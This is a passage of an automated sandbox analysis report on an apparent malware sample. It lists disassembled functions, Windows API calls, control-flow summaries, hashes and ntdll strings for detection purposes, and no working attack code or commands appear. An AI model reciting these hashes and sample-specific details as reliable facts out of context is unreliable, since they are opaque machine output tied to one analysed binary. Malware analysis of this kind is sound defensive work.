                                                                                  control_flow_graph 50 4239c3-4239f4 call 43e0f3 call 43eb03 55 4239fa-423a31 call 414453 call 434863 50->55 56 4239f5 call 427153 50->56 61 423a53-423a58 55->61 62 423a33-423a44 PostThreadMessageW 55->62 56->55 62->61 63 423a46-423a50 62->63 63->61
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(13612MI5K,00000111,00000000,00000000), ref: 00423A40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 13612MI5K$13612MI5K
                                                                                  • API String ID: 1836367815-1335936682
                                                                                  • Opcode ID: 90e96fec420018839f70968de642e70c750cb8783c3512a1f07519ec586c6146
                                                                                  • Instruction ID: fd5ddefd869bd4138bcc46199b339f662d1c5a33c1f00a86b6e20d0252b75cb6
                                                                                  • Opcode Fuzzy Hash: 90e96fec420018839f70968de642e70c750cb8783c3512a1f07519ec586c6146
                                                                                  • Instruction Fuzzy Hash: F601C431E4021876EB11A6A19C06FDF7B7C9F81B58F14C159FA047B2C0D6BCAA0687E6
                                                                                  Function 004239AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 64 4239ab-4239ad 65 42398e-423996 64->65 66 4239af-4239b2 64->66 69 4239f0 65->69 70 423998-4239aa 65->70 67 423a12-423a31 66->67 68 4239b4-4239bb 66->68 73 423a53-423a58 67->73 74 423a33-423a44 PostThreadMessageW 67->74 68->67 71 4239f2-4239f5 call 427153 69->71 72 4239fa-423a0d call 414453 call 434863 69->72 71->72 72->67 74->73 77 423a46-423a50 74->77 77->73
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(13612MI5K,00000111,00000000,00000000), ref: 00423A40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 13612MI5K$13612MI5K
                                                                                  • API String ID: 1836367815-1335936682
                                                                                  • Opcode ID: b2023082ce1675faf98e85ceaaf02e63b56618d6c893222e81ff4bddd1367cec
                                                                                  • Instruction ID: e1bffe134db7cc1799c1bb0b7c5ccd27e699b511d96030ee9df5c66d0ea13b0e
                                                                                  • Opcode Fuzzy Hash: b2023082ce1675faf98e85ceaaf02e63b56618d6c893222e81ff4bddd1367cec
                                                                                  • Instruction Fuzzy Hash: 31017031F4121467DB01CE94FC42BDEF778AB82754F448196DA0567240D67C8A018BD9
                                                                                  Function 0043C2F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 80 43c2f3-43c331 call 4144e3 call 43d1f3 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00000000,?,00000000,?,?,0043442F,?), ref: 0043C32C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: /DC
                                                                                  • API String ID: 1279760036-3079684836
                                                                                  • Opcode ID: 82b667d971545224e14f2a0e876bad416e4c1c662e8abfd6be95cf47319361f2
                                                                                  • Instruction ID: c903d0971c48fcf122aacfc21b70ecfe12b3d7fd64a51cbf6a924812ba4bb0dd
                                                                                  • Opcode Fuzzy Hash: 82b667d971545224e14f2a0e876bad416e4c1c662e8abfd6be95cf47319361f2
                                                                                  • Instruction Fuzzy Hash: 66E09275604204BFD624EF59EC41FEB73ACEFC9710F004119F909A7242D670B91087B4
                                                                                  Function 0043C333 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 109 43c333-43c374 call 4144e3 call 43d1f3 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B104D8B,00000007,00000000,00000004,00000000,004269D1,000000F4), ref: 0043C36F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: d14c62eb69cca364428996c5553d855d59e6f1fe04e10440ad974a44f14029f2
                                                                                  • Instruction ID: 8addf4538bd75c860edf82216b4d5361259997e3a8a470ec8476dfd77de84cba
                                                                                  • Opcode Fuzzy Hash: d14c62eb69cca364428996c5553d855d59e6f1fe04e10440ad974a44f14029f2
                                                                                  • Instruction Fuzzy Hash: A7E09275600205BBC624EF49EC46FAB33ACEFC9710F004519F908A7241D670BD1087B9
                                                                                  Function 0043C383 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 119 43c383-43c3bc call 4144e3 call 43d1f3 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,5A9996EB,?,?,5A9996EB), ref: 0043C3B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: f9a3a9da39839b5a70e0d25e6737cf736f2e68c13846871e79f2b581ccc73a83
                                                                                  • Instruction ID: e336eb5468931cef3d0c1dc5d18b1f1e21165fd019ee7ea681449dcd189f4d47
                                                                                  • Opcode Fuzzy Hash: f9a3a9da39839b5a70e0d25e6737cf736f2e68c13846871e79f2b581ccc73a83
                                                                                  • Instruction Fuzzy Hash: 7CE0463A6002047BD620EA6ADC02FDB7BACEFC5714F00851AFA08A7241CA75BA11C7A4
                                                                                  Function 01852C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 124 1852c0a-1852c0f 125 1852c11-1852c18 124->125 126 1852c1f-1852c26 LdrInitializeThunk 124->126
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2f8c2a7e7f2119047157fcddb2f4a6f5e494cf9f43b7f755912b50b067d213df
                                                                                  • Instruction ID: a92b9a01d327d72826e0690663e3123e9a344e096f897352b3e37720105f1ba9
                                                                                  • Opcode Fuzzy Hash: 2f8c2a7e7f2119047157fcddb2f4a6f5e494cf9f43b7f755912b50b067d213df
                                                                                  • Instruction Fuzzy Hash: F0B09B719015C5C9DB51E764460871B7905B7D1741F15C061D7074641F4738C6D5E276

                                                                                  Non-executed Functions

                                                                                  Function 01892349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 5f40dbe5e5aeae955c821c5d4ff36786b5ef8e56f93663e5f6b29229b33302a0
                                                                                  • Instruction ID: dce1a4d9467b701ed689dd546597011bb98062dde570ed8ea0eecc2e87aca23c
                                                                                  • Opcode Fuzzy Hash: 5f40dbe5e5aeae955c821c5d4ff36786b5ef8e56f93663e5f6b29229b33302a0
                                                                                  • Instruction Fuzzy Hash: 7792A271604346AFEB21CF28C880F6BB7EABB84754F08481DFA95D7251D770EA44CB92
                                                                                  Function 018068B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-3089669407
                                                                                  • Opcode ID: db87d99e63677ec063629330230cc17e851121285e771f7d13488fbec6dd2397
                                                                                  • Instruction ID: bad2af90deb46c87100f104c82b7b187984698419748b45ccc1043819f6c2b5e
                                                                                  • Opcode Fuzzy Hash: db87d99e63677ec063629330230cc17e851121285e771f7d13488fbec6dd2397
                                                                                  • Instruction Fuzzy Hash: 468121B2D01219AF9B52EAA8DDD4EDF77FDEB187247150426F901F7114E630EE048BA1
                                                                                  Function 018B5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018B5FE1
                                                                                  • LanguageConfiguration, xrefs: 018B6420
                                                                                  • LanguageConfigurationPending, xrefs: 018B6221
                                                                                  • @, xrefs: 018B647A
                                                                                  • Control Panel\Desktop, xrefs: 018B615E
                                                                                  • @, xrefs: 018B61B0
                                                                                  • InstallLanguageFallback, xrefs: 018B6050
                                                                                  • @, xrefs: 018B6027
                                                                                  • PreferredUILanguages, xrefs: 018B63D1
                                                                                  • @, xrefs: 018B6277
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018B635D
                                                                                  • PreferredUILanguagesPending, xrefs: 018B61D2
                                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 018B5A84
                                                                                  • @, xrefs: 018B63A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1325123933
                                                                                  • Opcode ID: 01cebeef4920ccfd184d41daaac91bbbb0dd5c4db81de1269f10065a19070f63
                                                                                  • Instruction ID: bb968a2947b6c4340cf9b0f306045756f993dc42a2db6064e8083eadc628454c
                                                                                  • Opcode Fuzzy Hash: 01cebeef4920ccfd184d41daaac91bbbb0dd5c4db81de1269f10065a19070f63
                                                                                  • Instruction Fuzzy Hash: B27256715083419BD761DF28C890BABBBE9FF88704F54492DFA85D7350EB34EA058B92
                                                                                  Function 01848620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • corrupted critical section, xrefs: 018854C2
                                                                                  • double initialized or corrupted critical section, xrefs: 01885508
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0188540A, 01885496, 01885519
                                                                                  • Critical section debug info address, xrefs: 0188541F, 0188552E
                                                                                  • Thread identifier, xrefs: 0188553A
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018854CE
                                                                                  • 8, xrefs: 018852E3
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018854E2
                                                                                  • Critical section address, xrefs: 01885425, 018854BC, 01885534
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01885543
                                                                                  • undeleted critical section in freed memory, xrefs: 0188542B
                                                                                  • Critical section address., xrefs: 01885502
                                                                                  • Invalid debug info address of this critical section, xrefs: 018854B6
                                                                                  • Address of the debug info found in the active list., xrefs: 018854AE, 018854FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 4014de30444fb358ad82b294dac67902c2798abde3dbaa49ad30244a00b6764a
                                                                                  • Instruction ID: f38e8ffc757bca96fcbb6a2dcb460204b883ce37d08e9307f8406130bce04b53
                                                                                  • Opcode Fuzzy Hash: 4014de30444fb358ad82b294dac67902c2798abde3dbaa49ad30244a00b6764a
                                                                                  • Instruction Fuzzy Hash: 70819BB1A41348AFDB21CF9AC844BAEBBB5FB09B14F10415DF604F7290D771AA40CB61
                                                                                  Function 018429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • @, xrefs: 0188259B
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0188261F
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01882506
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018825EB
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018824C0
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01882412
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01882409
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01882624
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018822E4
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01882602
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01882498
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: b04526981bdf5a134e428ba81b4d3654c7d729e138f066de93c3bbfa3b1bffb4
                                                                                  • Instruction ID: 4b2e86a18f1be9da5d4080664ac9f5dc5855b3f3e233855254997212c3560f78
                                                                                  • Opcode Fuzzy Hash: b04526981bdf5a134e428ba81b4d3654c7d729e138f066de93c3bbfa3b1bffb4
                                                                                  • Instruction Fuzzy Hash: 83024EF1D0422D9BDB31DB58CD80B9AB7B9AB54304F4441DAA709E7241DB709F84CF69
                                                                                  Function 01840F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                  • API String ID: 0-360209818
                                                                                  • Opcode ID: 0c74f297a121a74049f21b247f5e807bfcbf218da9f06bece2834b4267e42982
                                                                                  • Instruction ID: 5a8e247a0b07f5b189a8eb053e34eb20b04e9ccf523022a9796f24cea236fd00
                                                                                  • Opcode Fuzzy Hash: 0c74f297a121a74049f21b247f5e807bfcbf218da9f06bece2834b4267e42982
                                                                                  • Instruction Fuzzy Hash: 04629FB1A002298FDB24EF18C8457A9B7B2BF95314F5482DAD549EB240DB726FD2CF50
                                                                                  Function 018B8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: b9d78cbdcabb8cf90162a44b94d5e5062fe6f8cd2909491e66f2326185351ad9
                                                                                  • Instruction ID: 94d4d80239beebb4e9145345fa6783c5e5bc4d706c8401ad386eb4acd34aff69
                                                                                  • Opcode Fuzzy Hash: b9d78cbdcabb8cf90162a44b94d5e5062fe6f8cd2909491e66f2326185351ad9
                                                                                  • Instruction Fuzzy Hash: 8351AFB15083069BD329DF188884BEBBBECEF99744F14492EA999C3241E770D744CBD2
                                                                                  Function 018C12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                  • API String ID: 0-3591852110
                                                                                  • Opcode ID: e6b6f36d3f083cac421f642d180b77ceb384101c3eb9e0b8f747f5588e4b2861
                                                                                  • Instruction ID: 0a589c7b44fa5b52e210ab308b8b1e53ec7a7dcef899c5791a78eac20a4a1cd7
                                                                                  • Opcode Fuzzy Hash: e6b6f36d3f083cac421f642d180b77ceb384101c3eb9e0b8f747f5588e4b2861
                                                                                  • Instruction Fuzzy Hash: F412CF74604646DFD7268F29C4C9BB6BBE5FF09B08F18845DE486CB682D734EA81CB50
                                                                                  Function 0182AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-3197712848
                                                                                  • Opcode ID: 3634767613235cbd854f15234eca5be3c0004353bd8f8243f5e3a372ec4decf3
                                                                                  • Instruction ID: fadd5226342c9ac5e9f8392a47541c1f6df337ad6ec63c83b6b1c17ff43efa3e
                                                                                  • Opcode Fuzzy Hash: 3634767613235cbd854f15234eca5be3c0004353bd8f8243f5e3a372ec4decf3
                                                                                  • Instruction Fuzzy Hash: 031203716093658FD326DF28C484BAAB7E4BF85B18F04091DF985DB291E734DB84CB92
                                                                                  Function 0180D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                  • API String ID: 0-3532704233
                                                                                  • Opcode ID: 3fb2541eba36a1cd36ec8a2e58ffd02b36f791605a39502037ea2fe87a5b5411
                                                                                  • Instruction ID: 2ae31d4fe290141de29a03890c6291b4cee12bfe38f79fe7b90a7dd10606c95e
                                                                                  • Opcode Fuzzy Hash: 3fb2541eba36a1cd36ec8a2e58ffd02b36f791605a39502037ea2fe87a5b5411
                                                                                  • Instruction Fuzzy Hash: 5BB1C3715083599FD756DFA8C880A6BBBE8BF88754F014A2EF995D7240D730DA04CB93
                                                                                  Function 018C0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                  • API String ID: 0-1357697941
                                                                                  • Opcode ID: a3767ae9d5bfb3429a8ab3f58e0fd762dc3d3b647ccbfb6e72234dc63c4dd733
                                                                                  • Instruction ID: 5920b9471c80a11873b35749ce550778f16eadca44773f3f42fcaf85dd69376f
                                                                                  • Opcode Fuzzy Hash: a3767ae9d5bfb3429a8ab3f58e0fd762dc3d3b647ccbfb6e72234dc63c4dd733
                                                                                  • Instruction Fuzzy Hash: 14F11479A4064AEFDB26CF68C484BAABBF5FF09B04F04805DE581D7282D734EA45CB51
                                                                                  Function 018C0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: 04bfeb39a08e24a8a03b1728d521240b32e14645ccabe65c4608f787b7047b27
                                                                                  • Instruction ID: aab1b5ff2335e6477f0e81681778d8464c3ad9038c6bd1c5179fae75b97a11c1
                                                                                  • Opcode Fuzzy Hash: 04bfeb39a08e24a8a03b1728d521240b32e14645ccabe65c4608f787b7047b27
                                                                                  • Instruction Fuzzy Hash: D8D1B93960468ADFDB22DF68C840AAABBF1FF59B44F08805DF545DB252D734DA81CB11
                                                                                  Function 018989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HandleTraces, xrefs: 01898C8F
                                                                                  • VerifierFlags, xrefs: 01898C50
                                                                                  • VerifierDebug, xrefs: 01898CA5
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01898A67
                                                                                  • VerifierDlls, xrefs: 01898CBD
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01898B8F
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01898A3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
